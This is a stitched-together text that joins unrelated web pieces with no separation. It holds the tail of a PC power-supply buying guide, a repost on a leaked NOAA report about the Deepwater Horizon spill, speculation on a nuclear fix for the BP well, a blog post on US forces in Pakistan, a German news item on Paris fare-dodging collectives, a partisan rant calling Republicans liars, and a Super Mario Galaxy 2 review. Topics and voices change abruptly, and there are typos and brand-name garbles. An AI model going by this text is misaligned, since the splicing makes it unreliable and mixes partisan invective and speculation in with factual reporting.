In the markerting world ( read : In a dream world ) where the 3.3V and 5V do n’t use any power you ’d have 580W available in total , to be separated between all the 12V lines .
580W / 12V = 48.33A .
That ’s the maximum amount of 12V amps that the power supply would be able to supply in an unrealistic situation .
Now , back to real life , let ’s assume that the 3.3V ( @10A=33W ) and 5V ( @10A=50W ) used 88W .
This is a guess , not too far from real usages though , which varies depending on your setup of course .
In this assumption , that means that the 12V lines would have 492W now .
492W / 12V = 41A .
Confusing Marketing Tricks
In both cases ( 48.33A or 41A ) , that ’s far from the 72A you would have first thought of right ?
Over 40 % off what you would have thought in the second case !
Imagine buying a car only to discover that it offers more than 40 % less power than you thought , because of confusing marketing tricks .
You would be pissed right ?
So this goes to show you that you have to be careful with multiple 12V rails power supply for that .
Marketing makes it look like this particular power supply from OCZ does deliver up to 72A on the 12V lines , because anyone could easy conclude that by adding up the 4 lines amps together .
3 . Choosing a no-name or low - quality brand power supply
The differences between a no - name / low - quality and a high - quality power supply
A high - quality power supply is equipped with higher quality components that protects your computer from a variety of risks .
It will also be equipped with safety circuitry to prevent damage resulting from short circuits , over current and over voltage .
A cheap or low - quality power supply is not equipped qith such safety features and will let your computer take the damage resulting from electric dangers !
Most important , high - quality power supplies are equipped with PFC ( Power Factor Corrected ) meaning that they can actually output the power that they are rated for .
What do I mean by that ?
Read more below :
Detailed explanation on what is PFC :
The power drawn by computing equipment is expressed in Watts or Volt - Amps ( VA ) .
The power in Watts is the real power drawn by the equipment .
Volt - Amps are called the “ apparent power ” and are the product of the voltage applied to the equipment times the current drawn by the equipment .
Both Watt and VA ratings have a use and purpose .
The Watt rating determines the actual power purchased from the utility company and the heat loading generated by the equipment .
The VA rating is used for sizing wiring and circuit breakers .
The VA and Watt ratings for some types of electrical loads , like incandescent light bulbs , are identical .
However , for computer equipment the Watt and VA ratings can differ significantly , with the VA rating always being equal to or larger than the Watt rating .
The ratio of the Watt to VA rating is called the “ Power Factor ” and is expressed either as a number ( i.e. 0.7 ) or a percentage ( i.e. 70 % ) .
The Watt rating for a computer may not be equal to the VA rating !
All Information Technology equipment including computers uses an electronic switching power supply .
There are two basic types of computer switching power supplies , which are called 1 ) Power Factor Corrected supplies or 2 ) Capacitor Input supplies .
It is not possible to tell which kind of power supply is used by inspection of the equipment , and this information is not commonly provided in equipment specifications .
Power Factor Corrected or PFC supplies were introduced in the mid 1990 ’s and have the characteristic that the Watt and VA ratings are equal ( power factor of 0.99 to 1.0 ) .
Capacitor Input supplies have the characteristic that the Watt rating is in the range of .55 to .75 times the VA rating ( power factor of 0.55 to 0.75 ) .
( Thank you for this information , which comes from White Paper # 15 , from Neil Rasmussen at APC .
If you want more details on the difference between Watts and Volt - Amps , on power supplies and PFC , you can read the integral version of the White Paper # 15 here .
Note that it ’s a Pdf Document , so you need Abode Reader installed on your computer to open it . )
Brands to avoid :
A - TOP Technology
Apevia
APEX ( SUPERCASE / ALLIED )
Aspire ( Turbo Case )
ATADC
Athena Power
ATRIX
Broadway Com Corp
Coolmax
Deer
Diablotek
Dynapower USA
Dynex
EagleTech
FOXCONN
FSP Everest
HEC Orion
Hiper Type-R
I - Star Computer Co. Ltd
In Win
JPAC COMPUTER
Just PC
Kingwin Inc .
Linkworld Electronics
Logisys Computer
MGE
MSI
NMEDIAPC
Norwood Micro / CompUSA
NorthQ
NZXT
Okia
Powmax
Q- Tec
Raidmax
Rocketfish
Rosewill
SFC
Shuttle
Skyhawk
Spire Coolers
Star Micro
STARTECH
Thermaltake Purepower NP
Thermaltake TR2
TOPOWER TOP
Ultra X - Connect
Ultra X2 >700 watts
Wintech
XION
YoungYear
Zebronics
My Top 10 Recommended Brands
Antec : Avoid any EarthWatts models over 700W , but the rest of Antec power supplies are recommended .
Cooler Master : Avoid their eXtreme series but the rest of Cooler Master power supplies are recommended .
Corsair EnerMax PC Power and Cooling RoseWill : Only their Xtreme / RX series .
Avoid other series .
SeaSonic SevenTeam Silverstone Thermaltake : Only their Purepower and Toughpower series .
Avoid other series .
Thanks to folks at EggXpert and their Tiered Power Supply List that has been of great help for this section .
4. Not Considering the Extra Power Requirements of Overclocking
Overclocking , or raising a part ( CPU , Video Card , RAM ) frequency beyond the manufacturer set frequency to gain extra performance , is a strain for a power supply .
If you overclock , it is even more important to have a high - quality power supply that can handle the extra load .
As the frequency increase , so does the power consumed by the overclocked part .
If you raise the voltage , the power consumption goes up even more , putting even more stress on your power supply .
How much is hard to quantify , as every CPU and video card have different power requirements .
However , it is not rare to see the power consumption go up by 50W , 100W , 150W or even more , depending on your computer setup .
I simply recommend that if you overclock , make sure that your power supply is powerful enough to handle the extra load .
If you have a cheap power supply or are already close to its limit , do not overclock as you ’re putting your power supply and possibly your computer on the line !
5. Not Considering How Many Connectors You Need Now and Not Planning Possible Parts Upgrades Down the Road
So , you know how many watts you need , you keep a close eye on the Amps rating , have chosen a good brand and have taken in consideration overclocking ( or no overclocking ) .
Making Sure You Have Enough Connectors for All your Parts
Now , you have to make sure that you have enough connectors for everything and that they are long enough .
Every power supply comes with a 20+4 ( or 24 ) pin ATX connector and a 4/8 pin 12V connector , that both connect in the motherboard .
Video Cards will need either one or 6 - pin PCI - Express connector , one 8 - pin or a mix of the two .
Needless to say , if you have 2,3 or 4 video cards , make sure to get a power supply with enough connectors .
Then you have hard drives , optical drives that use either SATA or Molex 4 - pin connectors and fans that use molex connectors .
Once again , make sure you have enough connectors .
Planning Possible Parts Upgrades Down the Road
Knowing that a good power supply can last you many years , you want to think about possible upgrades to your computer system in the future , to make sure that your power supply can handle the load with that new part .
For example , if you choose to go with an on - board video card for now , but decide to upgrade to an high - end video card , which can easily draw 150 - 200W alone , you want to make sure to consider that when you ’re planning your power supply purchase .
Otherwise , your computer wo n’t boot , will freeze , reboot randomly or in the worse case scenario , your power supply will give up with a bang , literally .
In the process , it might fry one or several parts in your computer too .
You would n’t be happy if your brand new $ 200 video card gets kill because of an inadequate power supply now , would you ?
6. A Power Supply with Poor Efficiency
One of the power supply jobs is the convert current from AC ( From your outlet ) to DC ( To your Computer Parts ) .
This is not a perfect process and some energy is lost in the process , in the form of heat .
A power supply efficiency , on average , can be as low as 60 % or as high as 90 % .
While your computer wo n’t explode due to a power supply with poor efficiency , your electric bill will !
Let ’s do some maths here to compare a 70 % efficient power supply and a 85 % efficient one , two efficiency level commonly found in computer power supplies .
Let ’s assume that your electricity cost is $ 0.15 per KW/h , that you use your computer ten hours per day and that it consumes on average 500W ( High - end Gaming PC in gameplay for example ) .
A power supply with an efficiency of 70 % will use about 710W to output 500W .
while a power supply with an efficiency of 85 % will use about 590W to output 500W , for a difference of 120W between 70 % and 85 % efficiency .
120W x 10 hours = 1200W per day .
1200W per day x 365 days = 438,000
Watts more per year .
Now , your bill is in KW , so 438,000 / 1000 = 438 KW .
Now , multiply the KW with the cost by KW / H 438 x $ 0.15 = $ 65.70
That ’s the difference in cost for your electricity bill after one year .
In this example , using a less expensive but less efficient power supply will cost $ 65.70 per year more compared to the power supply with 85 % efficiency .
80 PLUS certified :
Power Supplies that are certified 80 PLUS have been independently tested for their efficiency .
Now , there are 4 different 80 PLUS certifications , depending on how efficient the power supply is :
80 PLUS : The power supply is at least 80 % efficient at 20%,50 % and 100 % load
80 PLUS Bronze :
The power is at least 82 % efficient at 20 % and 100 % and 85 % efficient at 50 % load .
80 PLUS Silver :
The power is at least 85 % efficient at 20 % and 100 % and 88 % efficient at 50 % load .
80 PLUS Gold :
The power is at least 87 % efficient at 20 % and 100 % and 90 % efficient at 50 % load .
The 80 PLUS and highercertifications are the way to go when you are looking for an efficient power supply .
Do not trust specifications such as “ Efficiency : 80 % to 85 % Efficiency Typical ” that are not 80 PLUS certified .
80 PLUS is an independent standard test .
No 80 PLUS and “ Efficiency : 80 % to 85 % Efficiency Typical ” means that it is 80 % to 85 % efficient , according to the manufacturer that is , using their own in - house test , which may or may not so much represent real efficiency .
7. Bonus Point : The Best Power Supplies For Your Money
By that , I mean the power supplies that offer the best features at a given price .
Why would you want that , you ask ?
Because you want the best possible power supply for your hard - earned money !
If you have the time , reading detailed power suppliy reviews and specs are a lot of fun .
However , most of us do n’t have the time to do the research and just want the answers .
In other words , what you want to know is what is the best power supplies within your budget .
So if you do n’t have the time to do the research , or just do n’t care to do it , do n’t worry .
I ’ll come to your help with this guide of the best power supplies for your money .
Keep in mind :
I ’ll use this opportunity to remind you that this article is only a guideline for the prices I ’ve seen on November 27th .
You ’re letting yourself down if you ’re not looking for deals when you decide to purchase .
Keep in mind this when you read this list :
This list is based on the best U.S. prices from NewEis .
Prices and availability change everyday .
I ca n’t keep up with accurate pricing everyday , but I can suggest to you great power supplies that you wo n’t regret buying at the price ranges that I list .
Best Power Supply for ~$ 50 : CORSAIR CMPSU - 400CX 400W PLUS Certified
Best Power Supply for ~$ 75 : Antec EarthWatts EA650 650W 80 PLUS Certified
Best Power Supply for ~$ 100 : Antec TruePower New TP - 750 Blue 750W 80 PLUS BRONZE Certified
Great Alternatives at $ 100 :
Best Power Supply for ~ $ 125 : Seventeam ST - 850 PAF
850W 80 PLUS BRONZE Certified
Great Alternatives at $ 125 :
Best Power Supply for ~$ 150 : CORSAIR TX Series CMPSU -950TX 950W 80 PLUS BRONZE Certified
Great Alternatives at $ 150 :
Best Power Supply for ~$ 200 : SeaSonic X750 750W 80 PLUS GOLD Certified
Great Alternatives at $ 200 :
Best Power Supply for $ 300 : Antec TPQ - 1200 1200W 80 PLUS SILVER Certified
Conclusion
Here we are , 3500 + words later .
I hope that you enjoyed the article and I invite you to comment about it below , in the comments section .
Did you enjoy this article ?
Support me and Hardware Revolution
For each article , I spend many hours of research and many hours of writing / editing and I generously offer it to you and everyone else for free .
If you appreciate my work , you can help me cover my costs ( Hosting , living , etc. ) and support our community by making a donation .
How much should you donate ?
I suggest $ 10 because if you think about it , a white paper containing this much information , like what is contained in this article , from an expert with a decade of experience like me would easily cost you $ 100 , if not even more .
Have I mentioned all the time and money that I have saved you through this and all of the other articles available on Hardware Revolution ?
Obviously , this is a suggestion .
Donate what you can to support us .
Thank you very much .
cryptogon.com news – analysis – conspiracies
May 2nd , 2010
Via : al.com :
‘ The following is not public ’ document states
A confidential government report on the unfolding spill disaster in the Gulf makes clear the Coast Guard now fears the well could become an unchecked gusher shooting millions of gallons of oil per day into the Gulf .
“ The following is not public , ” reads the National Oceanic and Atmospheric Administration ’s Emergency Response document dated April 28 .
“ Two additional release points were found today in the tangled riser .
If the riser pipe deteriorates further , the flow could become unchecked resulting in a release volume an order of magnitude higher than previously thought . ”
Asked Friday to comment on the document , NOAA spokesman Scott Smullen said that the additional leaks described were reported to the public late Wednesday night .
Regarding the possibility of the spill becoming an order of magnitude larger , Smullen said , “ I ’m letting the document you have speak for itself . ”
In scientific circles , an order of magnitude means something is 10 times larger .
In this case , an order of magnitude higher would mean the volume of oil coming from the well could be 10 times higher than the 5,000 barrels a day coming out now .
That would mean 50,000 barrels a day , or 2.1 million gallons a day .
It appears the new leaks mentioned in the Wednesday release are the leaks reported to the public late Wednesday night .
“ There is no official change in the volume released but the USCG is no longer stating that the release rate is 1,000 barrels a day , ” continues the document , referred to as report No. 12 .
“ Instead they are saying that they are preparing for a worst - case release and bringing all assets to bear . ”
The emergency document also states that the spill has grown in size so quickly that only 1 to 2 percent of it has been sprayed with dispersants .
The Press - Register obtained the emergency report from a government official .
The White House , NOAA , the Coast Guard and BP Plc did not immediately return calls for comment made early this morning .
The worst - case scenario for the broken and leaking well pouring oil into the Gulf of Mexico would be the loss of the wellhead and kinked piping currently restricting the flow to 5,000 barrels — or 210,000 gallons — per day .
If the wellhead is lost , oil could leave the well at a much greater rate .
“ Typically , a very good well in the Gulf can produce 30,000 barrels a day , but that ’s under control .
I have no idea what an uncontrolled release could be , ” said Stephen Sears , chairman of the petroleum engineering department at Louisiana State University .
On Thursday , federal officials said they were preparing for the worst - case scenario but did n’t elaborate .
Kinks in the piping created as the rig sank to the seafloor may be all that is preventing the Deepwater Horizon well from releasing its maximum flow .
BP is now drilling a relief well as the ultimate fix .
The company said Thursday that process would take up to 3 months .
“ I ’m not sure what ’s happening down there right now .
I have heard there is a kink in what ’s called the riser .
The riser is a long pipe that connects the wellhead to the rig .
I really do n’t know if that kink is a big restriction .
Is that really a big restriction ?
There could be another restriction further down , ” said LSU ’s Sears .
“ An analogy would be if you have a kink in a garden hose .
You suspect that kink is restricting the flow , but there could be another restriction or kink somewhere else closer to the faucet .
BP Plc executive Doug Suttles said Thursday the company was worried about “ erosion ” of the pipe at the wellhead .
Sand is an integral part of the formations that hold oil under the Gulf .
That sand , carried in the oil as it shoots through the piping , is blamed for the ongoing erosion described by BP .
“ The pipe could disintegrate .
You ’ve got sand getting into the pipe , it ’s eroding the pipe all the time , like a sandblaster , ” said Ron Gouget , a former oil spill response coordinator for the National Oceanic and Atmospheric Administration .
“ When the oil is removed normally , it comes out at a controlled rate .
You can still have abrasive particles in that .
Well , now , at this well , its coming out at fairly high velocity , ” Gouget continued .
“ Any erosive grains are abrading the inside of the pipe and all the steel that comes in contact with the liquid .
It ’s essentially sanding away the pipe . ”
Gouget said the loss of a wellhead is totally unprecedented .
“ How bad it could get from that , you will have a tremendous volume of oil that is going to be offgassing on the coast .
Depending on how much wind is there , and how those gases build up , that ’s a significant health concern , ” he said .
The formation that was being drilled by Deepwater Horizon when it exploded and sank last week is reported to have tens of millions of barrels of oil .
A barrel contains 42 gallons .
Smullen described the NOAA document as a regular daily briefing .
“ Your report makes it sound pretty dire .
It ’s a scenario , ” he said , “ It ’s a regular daily briefing sheet that considered different scenarios much like any first responder would . ”
Research Credit : ltcolonelnemo
Collapse , Energy , Environment , Infrastructure | Posted in Atrocities Top Of Page
Now that BP's Top Kill attempt has failed , and it 's dawning on people that the leak really could go on until August ( provided the relief well works , which is no 100 % guarantee , which is why they 're drilling two of them ) , here 's what 's going to happen .
First , expect BP to be " off the job " in the coming days .
Having BP run the show has been a disaster for a couple of reasons .
One is that Obama has to defend the company 's actions , and two is that BP is HORRIBLE at PR , waiting hours to give updates that everyone is clamoring for .
Watch for the military to take over , though using BP 's resources and of course BP 's dime .
Next , the so - called " nuclear option " is about to get a lot of attention .
In this case , of course , nuclear option is not a euphemism .
It 's the real idea that the best way to kill this thing is to stick a small nuke in there and bury the well under rubble .
Supposedly it 's been done in Russia , and by the middle of the coming week , it will be all over cable news , as pundits press The White House hard on whether it 's being considered and why not .
BP will probably get slaughtered in London trading on Monday .
Apparently London has the day off , as well .
So watch out for an ugly Tuesday .
Last year , President Obama and his administration ruled out sending U.S. ground forces into Pakistan .
Instead , the White House said , America 's clandestine operations there would be waged solely by remote - control – with Predator and Reaper drones .
" There is a red line , " said special envoy Richard Holbrooke .
" And the red line is unambiguous and stated publicly by the Pakistani government over and over again : No foreign troops on our soil . "
Yet today , three U.S. soldiers were killed and two more were wounded by an improvised bomb in Pakistan .
The area was known " as a Taliban stronghold , " the * New York Times * notes .
But the " Pakistani military had declared cleared of the militants . "
It 's another sign that America 's once - small , once - secret war in Pakistan is growing bigger , more conventional , and busting out into the open .
The U.S. Air Force now conducts flights over Pakistani soil .
U.S. security contractors operate in the country .
U.S. strikes are growing larger , more frequent , and more deadly ; the latest attack reportedly involved 17 missiles and killed as many as 29 people .
Billions of dollars in U.S. aid goes to Islamabad .
And now , U.S. forces are dying in Pakistan .
Which begs the question :
When are we going to start treating this conflict in Pakistan as a real war – with real oversight and real disclosure about what the hell our people are really doing there ?
Maybe at one point , this conflict could 've been swept under the rug as some classified CIA op .
But that was billions of dollars and hundreds of Pakistani and American lives ago .
According to the U.S. Embassy in Islamabad , the American forces were there merely " to attend the inauguration ceremony of a school for girls that had recently been renovated with U.S. humanitarian assistance . "
These guys were merely trainers part of the small cadre – maybe a hundred or so – of U.S. special forces in Pakistan , beefing up the local Frontier Corps ' counterinsurgency skills .
As the* Long War Journal * notes , " The soldiers are not supposed to conduct military operations alongside the Frontier Corps units . "
But according to * Washington Post * columnist and de facto government spokesperson David Ignatius , " the improved U.S. - Pakistani cooperation extends to other activities [ beyond training ] as well .
A senior Pentagon official said Tuesday that in Bajaur , a tribal area bordering Afghanistan , the two countries ' military operations were ' much more coordinated . ' "
American forces have found themselves in combat within Pakistan 's borders before .
Back in 2001 , a pair of Rangers were killed in a Blackhawk crash in Pakistan .
In 2008 , a raid by U.S. special operations troopskilled as many as 20 Pakistanis .
There are also a host of American private security contractors in Pakistan .
Their exact roles are murky .
But their presence is well - known , and deeply controversial .
Which is why the Pakistani Taliban not only took credit for today 's bombing – but also claimed that the slain U.S. troops were , in fact , guns - for - hire .
" The Americans killed were members of the Blackwater group , ” a Taliban spokesman tells Dawn .
One operation the U.S. contractors are most certainly involved in : the drone strikes on suspected militant camps .
There have been 12 reported attacks just in 2010 – a huge increase over last year 's rate of about one strike per week .
And the drone show no signs of letting up .
Five aircraft supposedly participated in the most recent attack .
If press accounts are accurate , the drone unleashed almost their full load of missiles .
Each Repear unmanned aircraft carried four Hellfire missiles .
This attack reportedly included 17 or more Hellfire hits .
UPDATE : My pal Uncle Jimbo from Blackfive.net accuses me of " a bit of heavy breathing on this . "
He writes :
It is fair to point out that the ops in Pakistan are more tightly tied to a shooting war than many others , but does that mean we should take them and shine a bunch of bright lights on them ?
...
There is plenty of oversight operating where it belongs in classified briefings ...
The political environment in Pakistan is delicate as Hell so we properly tread lightly .
A bunch of breathless stories about the mere possibility that we are cooperating more w/ Pakistan or that heaven forbid the evil Blackwater mercenaries are helping load drones does n't make doing any good there easier ...
It is smart and a proper use of Special Forces .
Now let 's stop making their jobs harder by acting like something nefarious is going on .
I hear that .
And if this were some other , relatively small - scale SF operation ( cough Yemen cough ) , I 'd agree 100 % .
But there has been too much cash spent and too many lives lost in this mission to keep on operating as if it can all be kept behind the black door .
The Pakistanis know what we 're up to , and our secrecy is only fueling the paranoia and conspiracy theories – not to mention depriving Americans of their right to know how their blood and treasure is being spent .
UPDATE 2 : U.S. Central Command says the three troops killed today were n't trigger - pullers .
They were part of the military 's cadre of nation - builders , known as " civil affairs . "
A CENTCOM statement notes that " the service members were assigned to the Office of the Defense Representative , Pakistan to conduct civil affairs - related training at the invitation of the Government of Pakistan . "
In other words , these soldiers were n't involved in some high - speed , secret squirrel operation that needed to be kept quiet .
They were part of a growing U.S. counterinsurgency in Pakistan .
A widening war .
UPDATE 3 : Rusty Shackleford over at the Jawa Report also thinks I 'm off - base .
" Admitting that we have troops on the ground engaged in combat roles would – literally – lead to a civil war in Pakistan .
As it is , the Pakistani people tolerate – barely – the notion that foreign troops are there in a support mission , " he writes .
" It is a catch - 22 , ironic , and duplicitous : but calling this a war is the same thing as losing it .
Me , I 'm willing to be called two - faced for sake of winning a war .
Those that prefer consistency over * victory * are misguided . "
Captain Liz Mathias , on the other hand , thinks I 'm on the right track .
She writes in the comments :
Noah , I think you ’re point about disclosure is more than valid , especially given the propaganda edge covert US operations in Pakistan give the TTP .
As TTP routinely links Blackwater with large - scale attacks , they ’ve built a strong perception that any foreign invovlement , official , covert or contract , occurs without accountability .
Just as “ Blackwater ” did n’t go away when they changed their name , the real participation of US forces in Pakistan does n’t go away if we do n’t talk about it .
Obviously , she 's writing in a personal capacity here .
But it 's worth noting that , until recently , Captain Mathias was a spokesperson for the U.S. - led coalition in Kabul .
[ Photo : U.S. Army Central ]
ALSO :
Günstig durch Paris : " Versicherung " fürs Schwarzfahren
Französische Billettschwänzer tun sich zusammen .
Wer beim Schwarzfahren erwischt wird , zahlt die Strafe aus einem gemeinsamen Topf – und kommt so billiger weg .
Für alle , die in Paris mit der Metro ohne Ticket unterwegs waren , galt bisher als einzige Devise : sich nicht erwischen lassen .
Eine Buße für das Schwarzfahren kostet 50 Euro und für " Wiederholungstäter " sogar 72 .
Das brachte einige PariserInnen auf die Idee , das Risiko zu kollektivieren .
Das funktioniert nach demselben Solidaritätsprinzip wie jede Versicherung .
Jedes Mitglied bezahlt einen kleinen Beitrag in der Größenordnung von fünf Euro in den gemeinsamen Topf und wird daraus im Schadensfall entschädigt .
Gleich mehrere Kollektive haben dieses System in anderen französischen Städten umgesetzt .
Illegal ist diese Solidarität nicht .
Die Kollektive sind davon überzeugt , dass die öffentlichen Verkehrsmittel für die einzelnen BenutzerInnen gratis sein müssten .
Ein inoffizieller Sprecher dieser Bewegung , der anonym bleiben will , sagt : " Aus denselben Gründen wie Schule oder die Gesundheitswesen müssen die öffentlichen Transportmittel allen ohne Unterschied und darum gratis zugänglich sein . "
Die Provinzstadt Châteauroux im Süden von Orléans hat bereits 2001 den gebührenfreien Bustransport eingeführt .
Cédric Durand , ein Ökonom aus der Alternativszene , glaubt , dass die Verstaatlichung der Transportkosten keineswegs utopisch sei , da die Einnahmen aus Fahrscheinen und Abonnements in der Region Paris nur etwa 30 Prozent der gesamten Auslagen decken .
Damit bringen sie nur ein bisschen mehr ein , als die aufwendigen Kontrollen kosten .
Und schließlich subventioniere der Staat mit aus Steuergeldern finanzierten Straßen auch den Autoverkehr .
Sure , if a Republican ’s lips are moving , more often than not , they are lying , obfuscation , spinning , revising history or smirking to themselves as they create some fabulous tale .
Sometimes it ’s all too obvious they enjoy creating their own reality .
A form of mental masturbation , with some self loathing mixed in with supreme arrogance .
Case in point serial liar neocon Stephen F. Hayes writing at the Weakly Standard – Do n’t Mention the War , May 17 , 2010 , Vol. 15 , No. 33
The Times Square attack was the third time in the past six months that an individual terrorist with ties to high - level Islamic radicals overseas has launched an attack on the American homeland .
In each instance , America ’s vast , multibillion dollar intelligence and law enforcement establishment failed to detect the terrorists ’ plans beforehand .
Does Hayes mean Obama did not prevent an attempted attack the way Bush and Cheney did not prevent 9 - 11 after receiving warnings or Bush botched preventing Osama Bin Laden from escaping at Tora Bora .
Neocons should come with a warning label – May Get Whiplash from Flying Hypocrisy .
Former Bush speech writer Marc Thiessen – who thinks torture is the best thing since cheese spread in a can claiming that president Obama is killing too many terrorists .
Than there was Dick Cheney – who those with a clear head have long suspected of wanting to perpetuate the never - ending war – “ In 2007 , then Vice President Dick Cheney personally authorized the release of 11 Saudis from Guantanamo Bay , who then passed through a leaky Saudi halfway house terrorist rehabilitation program to rejoin Al Qaeda . ”
The Right has been trying to play the weak on national security card for months hoping to get some traction .
The fact is that Obama and Democrats have had remarkable success .
So much so they have also been attacked from the left for the increased use of drones among other issues .
Hayes has a lot invested in the urban myths surrounding terrorism .
He has been lying about the Iraq / al Qaeda connection and WMD for years – which earned him a job at the “ liberal ” CNN .
The Republican fascist - lite blog Ace of Spades writes about Newsweek ’s current problems in a mind numbing post absolutely free of any – what ’s that stuff called ?
evidence .
Oh the Irony : “ America is Back ! , ” Baby , But The Magazine Proclaiming This Just Might Go Out of Business
People can debate ethics .
They ( referring to liberals ) prefer to view their politics as a matter of strict black and white morality in which their view is not arguably the more ethical or sound one , but in which their view is Good ( capital G optional ) , and the opposite politics are Evil ( capital E required . )
One can debate such ethical dilemmas such as whether it ’s better to see your kid go hungry or steal a loaf of bread from another family .
One ca n’t argue , really , whether or not it ’s better to do Good than it is to do Evil .
Liberals favor the latter formulation .
Ace has the same short - term memory problems that plaque most Cons , in addition to the ability to live in a bubble of denial , the standard mental tools of every political zealot .
For eight years George W. Bush was not just president he was the leader of a personality cult in which he could do no wrong and the slightest criticism of him was anti-American .
Not anti-Bush per se and certainly not loyal opposition which is indicative of any democracy .
No Bush critics were traitors and terrorist lovers .
Hate ?
That was served up daily by the right - wing media and the so - called liberal media like the NYT that helped sell the Iraq disaster to the public ..
Deleting the Bush Personality Cult from history and Do Bush followers have a political ideology ? for starters .
Some books written by conservative ‘ thinkers ” during the Bush years included – Deliver Us from Evil : Defeating Terrorism , Despotism , and Liberalism by Sean Hannity , Treason : Liberal Treachery from the Cold War to the War on Terrorism by Ann Coulter , and Michelle Malkin ’s Unhinged : Exposing Liberals Gone Wild .
Remember the Jim Carey movie Liar. Liar .
If such a spell was possible and put on the Conservative movement they ’d knock themselves senseless in a few hours .
If you took away their ability to push the egregious Pravdaesque propaganda they could not have a debate .
Ace and the other right - wing bloggers gloating over Newsweek ’s demise might cause a few liberals to have seizures if they just admitted they hated Newsweek because it did not feed the Right the constant vitriol filled pabulum that they can never get enough of .
Newsweek was on occasion , actually balanced .
And goodness forbid they mention the right - wing Moonie Washington Times is sinking despite all the money the Right poured into it to keep that revenue bleeding yellow rag afloat .
Sue Lowden now running TV ad claiming ( wrongly ) that chickens - for - checkups was “ out of context ” .
Sometimes the worse thing one can do to a Republican is quote them accurately .
AG Paid $ 60,000 to Anti-Gay Activist Who Hired Male Prostitute .
That state Attorney General was Bill McCollum ( R ) .
Another conservative more interested in finding an “ expert ” to tell him what he wanted to hear rather than the truth .
A comrade of Stephen Hayes and Ace .
Self Described Tea Baggers .
National Review admits conservatives coined ‘ Teabagger ’
In the comment section where I took the screen shot of Big Government ’s chief propagandist Andrew Brietbart were these ,
Iam proud too Andrew !
thanks for all that you do .
It has been fun to watch .
Headplant – April 14th , 2010 at 7:47 pm
Been saying all along that I ’m proud to be a tea bagger .
Put it on my blog as well .
The left really did n’t think this nonsensical word through ( not that they ever think anything through ) , but if we are the teabaggers , then THEY are the ones being teabagged .
Guess who has the power ?
WE DO .
Finally , somebody catches this and utilizes it .
Good work , Breitbart and Nussbaum .
TheAudacity – April 14th , 2010 at 7:50 pm
( ArsTechnica ) --
My first thought after playing " Super Mario Galaxy 2 " for the first few hours was that Nintendo was kind of being a jerk about the whole thing .
It 's much harder to nail a satisfying game mechanic -- whether it's in 2 - D or 3 - D -- than people understand .
Nintendo constantly shows you something amazing and masterfully produced , and just when you 've gotten over being amazed at how well it plays , the game throws it away and offers up something else , equally good .
Saying this is Nintendo at its platforming best is an understatement .
This is the equivalent of a baseball player hitting nothing but home runs for an entire four - game series , calling his shots Babe - Ruth - style before each swing .
Nintendo plays with the genre like there is nothing at stake , doing incredible things with it as if it 's simply a decision to make a game this good .
The world is your ship
The game is a direct sequel to the first " Mario Galaxy , " except this time you 're given a ship shaped like Mario 's head to pilot around a simplified world map , filled with galaxies that are themselves given a selection of stars to try to find .
You land on a galaxy and get a task to complete to earn the star .
In addition , there is always a comet coin to track down in order to keep you exploring .
So what do you have to do to earn these stars ?
Everything !
Fight bosses , platform in 2 - D and 3 - D... you 'll swim , fly , float , and fall .
You 'll need to hurry , you 'll be forced to take your time .
In some cases gravity will be your enemy and at other times it will be your ally .
You 'll meet friends from past games ... and enemies too .
Sometimes entire sections of the game will remind you of past " Mario " games .
There is no way to describe the sheer joyous exploration of the game , nor how surprising many of the moments are , without playing it yourself .
We could list a variety of the levels , but why take away the fun of discovery ?
Mario is given a huge number of moves to interact with his world .
He can jump , grab , back - flip , triple - jump , long jump , and wall - jump .
There are circumstances where he can fly , tunnel , and roll .
He can grab items , ice - skate , climb , and butt - stomp on both enemies and the environment .
The genius of the level design is that you 're constantly being tested and stretched and asked to use all of these moves and actions .
If you see a far - off platform or glittery object , do n't worry .
You can get to it .
It will just take some imagination .
If you have any hope of collecting all the stars -- which is a daunting task -- you 'll have to explore every inch of the land and find every secret .
The hidden areas and secret stars are deviously scattered around the game , and each one will give you a feeling of accomplishment when found .
To progress throughout the game you need a set minimum of stars , but there are multiple ways to find them .
You can go back and find stars you 've missed , you can pick out the easy ones from the galaxies available to you , or you can explore the star challenges the comets bring as you collect the comet coins around the galaxies .
If you simply want to see each world and finish the game , the challenge is very slight .
The more you see and do , however , the more demanding the game becomes .
Extra lives are plentiful .
You can explore your ship between missions , and it 's filled with extra lives and colorful characters .
Grab 100 coins , you 'll get an extra life .
Collect 100 star bits , you 'll get an extra life .
Other characters will mail you extra lives .
Nintendo does n't want to punish you for trying new things in the levels , so it has made extra lives easy to find or even buy .
If you 're given an extra life in the middle of a challenge , look out : that 's Nintendo 's way of telling you " this is going to take you a few tries . "
The game will help you
Just like " New Super Mario Bros .
Wii , " if you mess up while trying to complete certain challenges enough times , the game will offer to help you .
During one particularly tricky section , I took the game up on its offer .
The computer takes over for you and completes the section , but at the end you 're given a bronze star .
If you want the gold star , you 'll have to do it yourself .
That bronze star counts towards your totals , so you can move to the next challenge or move closer to unlocking the next section of the game , but we 're guessing that you wo n't be able to see everything if you have bronze stars in your collection .
It 's a neat mechanic , and it 's used with flair : if you do n't want the help , you do n't have to use it .
If you use it , you 'll still need to go back and master that segment to get all the stars .
If you just want to " beat " the game and see the ending , this removes a large portion of the frustration .
While some gamers may sneer , we play games to have fun , and controller - throwing frustration is never fun .
This gives you the option of accepting a little help to move ahead , but if you do n't want it you can simply turn it down .
It 's a little touch that helps to make the game accessible for a wider audience , and the title is better for it .
Besides , on the computer - controlled run through of the challenge , Mario seemed to avoid grabbing coins and star bits , as if to say you wo n't be getting much help by the feature .
It 's a nice touch .
In conclusion
The multiplayer is still limited .
Player 2 can help you collect star bits or fight enemies by moving a cursor on the screen .
It 's a fun way to play with your kids and the extra helping hand can come in very handy during a level .
Still , the focus is on playing a single - player game and testing your platforming skills .
The game continually shifts and adjusts and introduces new challenges .
Some are simple , such as beating a level with a time limit .
Others are devilishly difficult , such as being followed by ghostly doubles who try to knock you down and keep you from your goals .
A moderately talented player will be able to enjoy the challenge and beat the game , but only the best will be able to do everything .
No matter what level you 're playing at , you can sit down for 20 minutes and have a good time , or you can lose yourself for hours .
The Mario haters will continue to bleat about the same ideas being rehashed once again , but the truth is that Nintendo is constantly trying to beat its own best , and it delivers exactly what gamers want -- and in huge doses .
This is , thus far , the peak of what platforming can offer .
Will it be beaten ?
Is it all downhill from here ?
Who cares ?
Let 's sit down and play .
Verdict : Buy
COPYRIGHT 2011 ARSTECHNICA.COM
In an interview with the BBC , Yahoo CEO Carol Bartz had some words of advice for those simplistic up - and - comers at Google : diversify !
That sound you hear ?
It 's everyone on the internet scratching their heads at the same time .
